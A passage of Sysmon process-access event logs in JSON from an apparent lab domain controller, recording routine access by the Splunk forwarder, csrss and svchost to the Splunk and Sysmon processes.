C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 